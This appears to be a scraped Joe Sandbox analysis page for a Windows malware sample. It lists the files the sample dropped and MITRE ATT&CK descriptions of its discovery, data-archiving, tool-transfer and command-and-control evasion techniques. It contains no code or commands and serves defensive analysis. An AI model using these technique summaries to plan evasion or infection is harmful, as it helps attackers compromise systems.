World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\4fkch1\4fkch1.exe

C:\Program Files (x86)\4fkch1\log.src

C:\Program Files (x86)\4fkch1\tbcore3U.dll

C:\Program Files (x86)\4fkch1\utils.vcxproj

C:\Program Files (x86)\G1f92m\12xy9.exe

C:\Program Files (x86)\G1f92m\log.src

C:\Program Files (x86)\G1f92m\tbcore3U.dll

C:\Program Files (x86)\G1f92m\utils.vcxproj

C:\Users\Public\Music\destopbak.ini

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FOM-53[1].jpg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\d[1].gif

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\f[1].dat

Windows Analysis Report
1387457-38765948.15.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre